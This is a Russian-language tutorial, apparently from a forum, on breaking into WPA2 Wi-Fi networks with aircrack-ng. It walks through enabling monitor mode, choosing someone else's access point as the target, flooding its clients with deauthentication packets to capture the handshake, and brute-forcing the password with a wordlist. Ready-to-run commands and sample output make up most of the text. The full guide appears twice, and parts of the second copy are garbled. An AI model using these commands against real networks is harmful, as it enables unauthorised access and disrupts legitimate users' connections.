Метод основан на перехвате и переборе handshake. WPA2
Весь процесс будет описан на примере Debian (Linux дистрибутив). Процесс не отличается на тех же Linux mint, Ubuntu(xubuntu, lubuntu и прочее гавно и т.д.), Kali linux, Arch (Manjaro), rpm-дистрибутивы (OpenSuse, Fedora), короче на любом линуксе. Отличается лишь процесс установки aircrack-ng.
Все действия происходят в терминале (консоли).
1. Подготовка.
Что бы использовать aircrack-ng, не обязательно использовать kali linux. Он без проблем работает на любом дистрибутиве без танцев.
Что бы установить его, заходим в терминал и пишем:
sudo apt-get install aircrack-ng
Подтверждаем установку и ждём. Пакеты имеют небольшой размер, поэтому всё ставится за несколько секунд.
Всё, aircrack установлен, больше нам ничего не потребуется. Идём дальше.
2. Процесс взлома.
Дальше всё сводится тупо к вводу команд в терминале и ожидании. Идём по порядку.
2.1 Переводим wifi карту в режим мониторинга.
Первым делом смотрим имя вашего wifi интерфейса. В терминале пишем.
Наблюдаем следующую картину:
Видим, что наш wifi интерфейс называется wlan0. Он может иметь и другое название, к примеру wlo0, wlan1 и т.д. Запоминаем его, или просто копируем в буфер обмена.
Теперь зная имя нашего интерфейса, можем перевести карту в режим мониторинга. Вводим в терминале:
Если имя вашего интерфейса отличается от приведённого примера, просто замените wlan0 на ваше. (sudo airmon-ng start имя_вашего_интерфейса)
Теперь в терминале наблюдаем следующую картину:
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Предпоследняя строчка указывает нам, что карта перешла в режим мониторинга. (monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
Теперь имя интерфейса изменилось. В конце мы видим что оно изменилось c wlan0 на wlan0mon ([phy0]wlan0 on [phy0]wlan0mon).
Для перестраховки вводим в терминале iwconfig ещё раз.
sudo iwconfig
Картина с прошлого раза изменилась. А конкретно изменилось название интерфейса:
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=15 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
Имя wlan0mon, Mode:Monitor. Всё что нам нужно. Переходим к следующему шагу.
2.2 Сканируем близлежащие WIFI точки.
Для того, что бы сканировать wifi точки, находящиеся рядом с вами, с последующим выбором цели для взлома, вводим в терминале:
Обратите внимание на название интерфейса в конце, вводится уже интерфейс, работающий в режиме мониторинга wlan0mon. У вас оно может отличаться, к примеру mon0. Просто заменяете на ваше. sudo airodump-ng имя_вашего_интерфейса (sudo airodump-ng mon0).
В терминале теперь наблюдаем примерно следующую картину:
CH 2 ][ Elapsed: 12 s ][ 2018-02-11 13:40
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
A1:B2:C3
4:E5:F6 -87 1 0 0 11 54e. WPA2 CCMP PSK WIFI-1
64:65:66:9C:8C:7C -49 39 0 0 11 54e. OPN WIFI2
C1:7D:F8:23:62:51 -63 39 0 0 6 54e. WPA2 CCMP PSK Runion_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E81 -87 0 - 6 0 1
Будут бегать цифры, постоянно изменяться информация, что то появляться, исчезать. Теперь поподробнее рассмотрим что мы видим из всего этого, и какую информацию можем извлечь для себя.
Что обозначают некоторые элементы и что нам из этого нужно. Всё что не рассматривается - нас не интересует в данный момент):
Верхняя часть:
BSSID - mac адреса wifi точек
PWR - если объяснить по русски, то это мощность сигнала, т.е. как далеко находится от нас wifi точка. Чем значение выше, тем лучше сигнал, а значит и точка находится ближе к нам (всё конечно утрированно, различные помехи, преграды wifi сигналу и так далее.Уровень сигнала не всегда показавыает, что одна точка находится ближе другой) В нашем примере, сигнал точки WIFI2 ловит лучше, чем сигнал точки Runion_wifi, так как значение PWR выше у WIFI2.
CH - канал, на котором работает wifi точка.
ENC - защита wifi точки. OPN показывает, что на точке нет пароля для подключения по wifi. WEP, WPA или WPA2 показывают, что точка защищена паролем.
ESSID - имя wifi точки.
В нижней части нас интересуют всего 2 показателя:
BSSID - mac адрес wifi роутера (тоже, что и в верхней части)
STATION - mac адреса клиентов, подключённых в данный момент к какой либо точке wifi.
В верхней части видим доступные точки wifi. В нашем примере их 3. WIFI-1, WIFI2 и Runion_wifi. В нижней части видим подключенных на данный момент клиентов к этим wifi. Сейчас подключен только 1 клиент к одной wifi точке, конкретно к mac адресу C1:7D:F8:23:62:51. В верхей части видим, что этот mac принадлежит Runion_wifi. Пароль к нему мы и попытаемся заполучить.
Теперь когда цель выбрана, которую решили взломать, нажимаем в терминале ctrl+c и переходим к следующему шагу.
2.3 Сканируем определённую точку, которую необходимо взломать.
Копируем mac адрес необходимой точки (в нашем случае C1:7D:F8:23:62:51 от Runion_wifi) и вводим следующую команду в терминале:
sudo airodump-ng wlan0mon --bssid C1:7D:F8:23:62:51 -c 6 -w handshake
Что тут за что отвечает и какие значения подставлять:
wlan0mon - имя вашего интерфейса, переведённого в режим мониторинга
--bssid C1:7D:F8:23:62:51 - мак адрес сканируемой точки. значение C1:7D:F8:23:62:51 заменяете на своё, точнее на мак адрес точки, которую выбрали в качестве цели
-c 6 - канал, на котором работает целевая точка. Из предыдущей команды мы видим, что интересующая нас точка Runion_wifi работает на 6 канале (значение CH 6), поэтому мы вписываем 6. Вы же вписываете то значение, которое у вас
-w handshake - имя файла, в который сохранится пойманный нами handshake. Можно вписать любое значение, (-w gospodipomogi)
Всё, точка сканируется. В терминале должно появиться теперь нечто подобное:
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK Runion_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E81 -22 0 - 2e 0 9 Runion_wifi
Картина тут такая же, как и в прошлом пункте, только теперь сканируются не все точки, а только одна, да и к тому же при ловле handshake, он сохраниться в файле, что нам и необходимо.
Теперь существует 2 варианта развития событий:
1 - на точке нет подключённых клиентов. Решение тут одно - ждать. Ждать подключения клиентов. Ожидание может занять большое колличество времени, но ничего тут не поделаешь. Как говориться на халяву и уксус сладкий. Хочешь халявы - жди. Когда клиент подключится к точке, в 95% случаев мы автоматически перехватим handshake, и дальше останется только последний шаг - перебор.
Как определить, что handshake пойман:
В самом правом верхнем углу в терминале появится соответствующая запись. (Естественно при включенном сканировании).
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21 ] [ WPA handshake: C1:7D:F8:23:62:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK Runion_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E81 -22 0 - 2e 0 9 Runion_wifi
WPA handshake: C1:7D:F8:23:62:51
2 - это когда клиент (или клиенты) уже подключены к точке, но handshake мы ещё не поймали. Тут нужно теперь отключить клиента (клиентов) от точки, и ждать когда они переподключатся. В этот момент переподключения мы и сможем поймать наш заветный handshake. Вопрос теперь - как их отключить? Переходим к следующему шагу.
P.s.: Открытое сканирование мы не закрываем и не останавливаем, пока не поймаем handshake
2.4 Отключаем подключенных клиентов к точке и ловим handshake.
Открываем новую вкладку терминала, или новое окно, тут уже как удобней. (Новую вкладку можно открыть комбинацией клавиш ctrl+shift+t, если не открылась, то открывайте новое окно тогда.)
Вводим следующую команду в терминале, подставляя свои значения. Ещё раз повторюсь, не отключаем сканирование airodump-ng.
sudo aireplay-ng wlan0mon -0 15 --ignore-negative-one -a C1:7D:F8:23:62:51 -c B5:A8:7C:5F:E81
Что тут за что отвечает и какие значения подставлять:
wlan0mon - имя вашего интерфейса, переведённого в режим мониторинга.
-0 15 - не трогаем, оставляем как есть.
--ignore-negative-one - не трогаем
-a C1:7D:F8:23:62:51 - тут вводится мак адрес wifi точки. Меняете значение на своё.
-c B5:A8:7C:5F:E81 - а здесь вводится мак адрес подключённого клиента. Взять его можно из запущенного окна сканирования airodump-ng внизу в столбце STATION. Если у вас там пусто, значит клиента на точке ещё нет, и нужно ждать когда он появится. Если там несколько mac адресов, то выбираете тот, который более активный, то есть в столбце Frames будет чаще всего изменяться цифра.
Теперь, когда подставили свои значения, нажимаем enter и смотрим. Должны постоянно появляться новые строчки, и вывод в терминале должен выглядеть примерно так:
15:54:01 Waiting for beacon frame (BSSID: C1:7D:F8:23:62:51) on channel 6
15:54:01 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:02 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:02 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:03 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:04 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:04 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:05 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:05 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [11|64 ACKs]
15:54:06 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:06 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 3|64 ACKs]
15:54:07 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 0|64 ACKs]
15:54:07 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 5|65 ACKs]
15:54:08 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E81] [ 4|64 ACKs]
Если строчки бегут, и вывод в терминале у вас совпадает с выводом, представленный в примере, открываем вкладку\окно терминала, где запущено сканирование airodump-ng, и ждём заветной строчки в правом верхнем углу терминала WPA handshake: C1:7D:F8:23:62:51
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21 ] [ WPA handshake: C1:7D:F8:23:62:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK Runion_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E81 -22 0 - 2e 0 9 Runion_wifi
Если строчка не появилась, значит мы не поймали handshake. Повторяем команду:
sudo aireplay-ng wlan0mon -0 15 --ignore-negative-one -a C1:7D:F8:23:62:51 -c B5:A8:7C:5F:E81
Повторяем до тех пор, пока не поймаем handshake. Если повторили раз 10-20 и до сих пор не поймали, значит пробуем сменить mac адрес клиента. (если конечно он есть. В окне airodump-ng внизу в столбце STATION показаны мак адреса всех подключеных клиентов, выбираем другой и повторяем aireplay-ng снова).
Если строчка WPA handshake: C1:7D:F8:23:62:51 появилась, необходимо подстраховаться и проверить, действительно ли мы поймали наш handshake.
Вводим в новом окне\вкладке терминала следующую команду:
aircrack-ng handshake-01.cap
handshake-01.cap - это название файла, введённый нами ранее в самом начале пункта 2.3
Просто пример из пункта 2.3 данной статьи
sudo airodump-ng wlan0mon --bssid C1:7D:F8:23:62:51 -c 6 -w handshake
-w handshake - именно это и нужно вводить, только уже без -w
Вывод в терминале должен выглядеть примерно следующим образом:
Opening handshake-01.cap
Read 179 packets.
# BSSID ESSID Encryption
1 C1:7D:F8:23:62:51 Runion_wifi WPA (1 handshake)
Choosing first network as target.
Opening handshake-01.cap
Please specify a dictionary (option -w).
Quitting aircrack-ng...
Обратите внимание, что первоначально мы вводили просто handshake, а получили на выходе handshake-01.cap. Это особенность программы. .сap это расширение сохранённого файла, а -01 дописывается автоматически, вобщем имейте ввиду. Так же учитывайте, что расширение должно быть именно .cap. airodump сохранил файлы в нескольких форматах, .cap, .csv и .kismet.netxml. Нас интересует именно .cap.
Всё. Теперь когда мы видим строчку WPA (1 handshake), можем остановить сканирование airodump-ng комбинацией клавиш ctrl+c. Остался последний шаг - перебор.
2.4 Перебор handshake по словарю.
Так как статья описывает взлом только лишь при помощи aircrack-ng, то и пример перебора покажу на aircrack-ng.
Естественно лучше использовать hashcat, и перебирать на gpu, но это уже совсем другая история...
Итак тут всё просто, подготавливаем словарь с паролями, и в терминале вводим следующее:
aircrack-ng -w /home/user/worlist handshake-01.cap
Тут надеюсь всё понятно.
-w /home/user/worlist - словарь с паролями, где /home/user/worlist это абсолютный путь до словаря
handshake-01.cap - наш файл с handshake. Мы его рассматривали ранее.
И всё, осталось только ждать. Должны быстро меняться цифры, буквы, короче будет визуально понятно что перебор пошёл.
Когда пароль будет подобран, в терминале должно появиться нечто подобное:
Aircrack-ng 1.2 rc4
[00:00:00] 7/9 keys tested (276.54 k/s)
Time left: 0 seconds 77.78%
KEY FOUND! [ 12345678 ]
Master Key : 64 5E 1B 0F 3C 93 74 84 B3 05 14 9D F5 64 E4 1C
56 BC B2 85 75 62 6E 97 BA 74 2A 45 17 DA 4E 93
Transient Key : 51 01 AC E7 19 1C C7 87 1D A9 70 38 AE D2 72 21
60 55 48 5F 8D D6 0A 33 B2 93 67 42 34 37 EB F7
B0 E7 B5 D8 52 8A A6 FB 83 36 4B F8 31 3B 24 F7
0D A0 75 94 F8 9F 14 7E 8A 5A 2E A4 26 12 BD 82
EAPOL HMAC : D2 D2 4B 7B 4D C4 BB 73 94 1A E0 C5 2E A9 23 B1
KEY FOUND! [ 12345678 ] - указывает нам, что ключ подобран. В нашем случае это 12345678
P.S. Многие утверждают, что этим способом х#й чё сламаешь уже не эффективно пользоваться. Скажу на личном опыте, что вполне эффективно при грамотном составлении словаря. Чисто рандомным словарём будете год ломать на процессоре. Поэтому для перебора handshake юзайте GPU, и всё подберётся за час-другой. Благо пароли на роутерах до сих пор полная х#йня легко поддаются взлому.
Весь процесс будет описан на примере Debian (Linux дистрибутив). Процесс не отличается на тех же Linux mint, Ubuntu(xubuntu, lubuntu и прочее гавно и т.д.), Kali linux, Arch (Manjaro), rpm-дистрибутивы (OpenSuse, Fedora), короче на любом линуксе. Отличается лишь процесс установки aircrack-ng.
Все действия происходят в терминале (консоли).
1. Подготовка.
Что бы использовать aircrack-ng, не обязательно использовать kali linux. Он без проблем работает на любом дистрибутиве без танцев.
Что бы установить его, заходим в терминал и пишем:
sudo apt-get install aircrack-ng
Подтверждаем установку и ждём. Пакеты имеют небольшой размер, поэтому всё ставится за несколько секунд.
Всё, aircrack установлен, больше нам ничего не потребуется. Идём дальше.
2. Процесс взлома.
Дальше всё сводится тупо к вводу команд в терминале и ожидании. Идём по порядку.
2.1 Переводим wifi карту в режим мониторинга.
Первым делом смотрим имя вашего wifi интерфейса. В терминале пишем.
sudo iwconfigНаблюдаем следующую картину:
Видим, что наш wifi интерфейс называется wlan0. Он может иметь и другое название, к примеру wlo0, wlan1 и т.д. Запоминаем его, или просто копируем в буфер обмена.
Теперь зная имя нашего интерфейса, можем перевести карту в режим мониторинга. Вводим в терминале:
sudo airmon-ng start wlan0Если имя вашего интерфейса отличается от приведённого примера, просто замените wlan0 на ваше. (sudo airmon-ng start имя_вашего_интерфейса)
Теперь в терминале наблюдаем следующую картину:
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Предпоследняя строчка указывает нам, что карта перешла в режим мониторинга. (monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
Теперь имя интерфейса изменилось. В конце мы видим что оно изменилось c wlan0 на wlan0mon ([phy0]wlan0 on [phy0]wlan0mon).
Для перестраховки вводим в терминале iwconfig ещё раз.
sudo iwconfig
Картина с прошлого раза изменилась. А конкретно изменилось название интерфейса:
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=15 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
Имя wlan0mon, Mode:Monitor. Всё что нам нужно. Переходим к следующему шагу.
2.2 Сканируем близлежащие WIFI точки.
Для того, что бы сканировать wifi точки, находящиеся рядом с вами, с последующим выбором цели для взлома, вводим в терминале:
sudo airodump-ng wlan0monОбратите внимание на название интерфейса в конце, вводится уже интерфейс, работающий в режиме мониторинга wlan0mon. У вас оно может отличаться, к примеру mon0. Просто заменяете на ваше. sudo airodump-ng имя_вашего_интерфейса (sudo airodump-ng mon0).
В терминале теперь наблюдаем примерно следующую картину:
CH 2 ][ Elapsed: 12 s ][ 2018-02-11 13:40
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
A1:B2:C3
4:E5:F6 -87 1 0 0 11 54e. WPA2 CCMP PSK WIFI-164:65:66:9C:8C:7C -49 39 0 0 11 54e. OPN WIFI2
C1:7D:F8:23:62:51 -63 39 0 0 6 54e. WPA2 CCMP PSK Runion_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E8
1 -87 0 - 6 0 1Будут бегать цифры, постоянно изменяться информация, что то появляться, исчезать. Теперь поподробнее рассмотрим что мы видим из всего этого, и какую информацию можем извлечь для себя.
Что обозначают некоторые элементы и что нам из этого нужно. Всё что не рассматривается - нас не интересует в данный момент):
Верхняя часть:
BSSID - mac адреса wifi точек
PWR - если объяснить по русски, то это мощность сигнала, т.е. как далеко находится от нас wifi точка. Чем значение выше, тем лучше сигнал, а значит и точка находится ближе к нам (всё конечно утрированно, различные помехи, преграды wifi сигналу и так далее.Уровень сигнала не всегда показавыает, что одна точка находится ближе другой) В нашем примере, сигнал точки WIFI2 ловит лучше, чем сигнал точки Runion_wifi, так как значение PWR выше у WIFI2.
CH - канал, на котором работает wifi точка.
ENC - защита wifi точки. OPN показывает, что на точке нет пароля для подключения по wifi. WEP, WPA или WPA2 показывают, что точка защищена паролем.
ESSID - имя wifi точки.
В нижней части нас интересуют всего 2 показателя:
BSSID - mac адрес wifi роутера (тоже, что и в верхней части)
STATION - mac адреса клиентов, подключённых в данный момент к какой либо точке wifi.
В верхней части видим доступные точки wifi. В нашем примере их 3. WIFI-1, WIFI2 и Runion_wifi. В нижней части видим подключенных на данный момент клиентов к этим wifi. Сейчас подключен только 1 клиент к одной wifi точке, конкретно к mac адресу C1:7D:F8:23:62:51. В верхей части видим, что этот mac принадлежит Runion_wifi. Пароль к нему мы и попытаемся заполучить.
Теперь когда цель выбрана, которую решили взломать, нажимаем в терминале ctrl+c и переходим к следующему шагу.
2.3 Сканируем определённую точку, которую необходимо взломать.
Копируем mac адрес необходимой точки (в нашем случае C1:7D:F8:23:62:51 от Runion_wifi) и вводим следующую команду в терминале:
sudo airodump-ng wlan0mon --bssid C1:7D:F8:23:62:51 -c 6 -w handshake
Что тут за что отвечает и какие значения подставлять:
wlan0mon - имя вашего интерфейса, переведённого в режим мониторинга
--bssid C1:7D:F8:23:62:51 - мак адрес сканируемой точки. значение C1:7D:F8:23:62:51 заменяете на своё, точнее на мак адрес точки, которую выбрали в качестве цели
-c 6 - канал, на котором работает целевая точка. Из предыдущей команды мы видим, что интересующая нас точка Runion_wifi работает на 6 канале (значение CH 6), поэтому мы вписываем 6. Вы же вписываете то значение, которое у вас
-w handshake - имя файла, в который сохранится пойманный нами handshake. Можно вписать любое значение, (-w gospodipomogi)
Всё, точка сканируется. В терминале должно появиться теперь нечто подобное:
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK Runion_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E8
1 -22 0 - 2e 0 9 Runion_wifiКартина тут такая же, как и в прошлом пункте, только теперь сканируются не все точки, а только одна, да и к тому же при ловле handshake, он сохраниться в файле, что нам и необходимо.
Теперь существует 2 варианта развития событий:
1 - на точке нет подключённых клиентов. Решение тут одно - ждать. Ждать подключения клиентов. Ожидание может занять большое колличество времени, но ничего тут не поделаешь. Как говориться на халяву и уксус сладкий. Хочешь халявы - жди. Когда клиент подключится к точке, в 95% случаев мы автоматически перехватим handshake, и дальше останется только последний шаг - перебор.
Как определить, что handshake пойман:
В самом правом верхнем углу в терминале появится соответствующая запись. (Естественно при включенном сканировании).
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21 ] [ WPA handshake: C1:7D:F8:23:62:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK Runion_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E8
1 -22 0 - 2e 0 9 Runion_wifiWPA handshake: C1:7D:F8:23:62:51
2 - это когда клиент (или клиенты) уже подключены к точке, но handshake мы ещё не поймали. Тут нужно теперь отключить клиента (клиентов) от точки, и ждать когда они переподключатся. В этот момент переподключения мы и сможем поймать наш заветный handshake. Вопрос теперь - как их отключить? Переходим к следующему шагу.
P.s.: Открытое сканирование мы не закрываем и не останавливаем, пока не поймаем handshake
2.4 Отключаем подключенных клиентов к точке и ловим handshake.
Открываем новую вкладку терминала, или новое окно, тут уже как удобней. (Новую вкладку можно открыть комбинацией клавиш ctrl+shift+t, если не открылась, то открывайте новое окно тогда.)
Вводим следующую команду в терминале, подставляя свои значения. Ещё раз повторюсь, не отключаем сканирование airodump-ng.
sudo aireplay-ng wlan0mon -0 15 --ignore-negative-one -a C1:7D:F8:23:62:51 -c B5:A8:7C:5F:E8
1Что тут за что отвечает и какие значения подставлять:
wlan0mon - имя вашего интерфейса, переведённого в режим мониторинга.
-0 15 - не трогаем, оставляем как есть.
--ignore-negative-one - не трогаем
-a C1:7D:F8:23:62:51 - тут вводится мак адрес wifi точки. Меняете значение на своё.
-c B5:A8:7C:5F:E8
1 - а здесь вводится мак адрес подключённого клиента. Взять его можно из запущенного окна сканирования airodump-ng внизу в столбце STATION. Если у вас там пусто, значит клиента на точке ещё нет, и нужно ждать когда он появится. Если там несколько mac адресов, то выбираете тот, который более активный, то есть в столбце Frames будет чаще всего изменяться цифра.Теперь, когда подставили свои значения, нажимаем enter и смотрим. Должны постоянно появляться новые строчки, и вывод в терминале должен выглядеть примерно так:
15:54:01 Waiting for beacon frame (BSSID: C1:7D:F8:23:62:51) on channel 6
15:54:01 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:02 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:02 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:03 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:04 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:04 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:05 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:05 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [11|64 ACKs]15:54:06 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:06 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 3|64 ACKs]15:54:07 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 0|64 ACKs]15:54:07 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 5|65 ACKs]15:54:08 Sending 64 directed DeAuth. STMAC: [B5:A8:7C:5F:E8
1] [ 4|64 ACKs]Если строчки бегут, и вывод в терминале у вас совпадает с выводом, представленный в примере, открываем вкладку\окно терминала, где запущено сканирование airodump-ng, и ждём заветной строчки в правом верхнем углу терминала WPA handshake: C1:7D:F8:23:62:51
CH 6 ][ Elapsed: 18 s ][ 2018-03-02 12:21 ] [ WPA handshake: C1:7D:F8:23:62:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C1:7D:F8:23:62:51 -51 100 210 15 3 6 54e. WPA2 CCMP PSK Runion_wifi
BSSID STATION PWR Rate Lost Frames Probe
C1:7D:F8:23:62:51 B5:A8:7C:5F:E8
1 -22 0 - 2e 0 9 Runion_wifiЕсли строчка не появилась, значит мы не поймали handshake. Повторяем команду:
sudo aireplay-ng wlan0mon -0 15 --ignore-negative-one -a C1:7D:F8:23:62:51 -c B5:A8:7C:5F:E8
1Повторяем до тех пор, пока не поймаем handshake. Если повторили раз 10-20 и до сих пор не поймали, значит пробуем сменить mac адрес клиента. (если конечно он есть. В окне airodump-ng внизу в столбце STATION показаны мак адреса всех подключеных клиентов, выбираем другой и повторяем aireplay-ng снова).
Если строчка WPA handshake: C1:7D:F8:23:62:51 появилась, необходимо подстраховаться и проверить, действительно ли мы поймали наш handshake.
Вводим в новом окне\вкладке терминала следующую команду:
aircrack-ng handshake-01.cap
handshake-01.cap - это название файла, введённый нами ранее в самом начале пункта 2.3
Просто пример из пункта 2.3 данной статьи
sudo airodump-ng wlan0mon --bssid C1:7D:F8:23:62:51 -c 6 -w handshake
-w handshake - именно это и нужно вводить, только уже без -w
Вывод в терминале должен выглядеть примерно следующим образом:
Opening handshake-01.cap
Read 179 packets.
# BSSID ESSID Encryption
1 C1:7D:F8:23:62:51 Runion_wifi WPA (1 handshake)
Choosing first network as target.
Opening handshake-01.cap
Please specify a dictionary (option -w).
Quitting aircrack-ng...
Обратите внимание, что первоначально мы вводили просто handshake, а получили на выходе handshake-01.cap. Это особенность программы. .сap это расширение сохранённого файла, а -01 дописывается автоматически, вобщем имейте ввиду. Так же учитывайте, что расширение должно быть именно .cap. airodump сохранил файлы в нескольких форматах, .cap, .csv и .kismet.netxml. Нас интересует именно .cap.
Всё. Теперь когда мы видим строчку WPA (1 handshake), можем остановить сканирование airodump-ng комбинацией клавиш ctrl+c. Остался последний шаг - перебор.
2.4 Перебор handshake по словарю.
Так как статья описывает взлом только лишь при помощи aircrack-ng, то и пример перебора покажу на aircrack-ng.
Естественно лучше использовать hashcat, и перебирать на gpu, но это уже совсем другая история...
Итак тут всё просто, подготавливаем словарь с паролями, и в терминале вводим следующее:
aircrack-ng -w /home/user/worlist handshake-01.cap
Тут надеюсь всё понятно.
-w /home/user/worlist - словарь с паролями, где /home/user/worlist это абсолютный путь до словаря
handshake-01.cap - наш файл с handshake. Мы его рассматривали ранее.
И всё, осталось только ждать. Должны быстро меняться цифры, буквы, короче будет визуально понятно что перебор пошёл.
Когда пароль будет подобран, в терминале должно появиться нечто подобное:
Aircrack-ng 1.2 rc4
[00:00:00] 7/9 keys tested (276.54 k/s)
Time left: 0 seconds 77.78%
KEY FOUND! [ 12345678 ]
Master Key : 64 5E 1B 0F 3C 93 74 84 B3 05 14 9D F5 64 E4 1C
56 BC B2 85 75 62 6E 97 BA 74 2A 45 17 DA 4E 93
Transient Key : 51 01 AC E7 19 1C C7 87 1D A9 70 38 AE D2 72 21
60 55 48 5F 8D D6 0A 33 B2 93 67 42 34 37 EB F7
B0 E7 B5 D8 52 8A A6 FB 83 36 4B F8 31 3B 24 F7
0D A0 75 94 F8 9F 14 7E 8A 5A 2E A4 26 12 BD 82
EAPOL HMAC : D2 D2 4B 7B 4D C4 BB 73 94 1A E0 C5 2E A9 23 B1
KEY FOUND! [ 12345678 ] - указывает нам, что ключ подобран. В нашем случае это 12345678
P.S. Многие утверждают, что этим способом х#й чё сламаешь уже не эффективно пользоваться. Скажу на личном опыте, что вполне эффективно при грамотном составлении словаря. Чисто рандомным словарём будете год ломать на процессоре. Поэтому для перебора handshake юзайте GPU, и всё подберётся за час-другой. Благо пароли на роутерах до сих пор полная х#йня легко поддаются взлому.
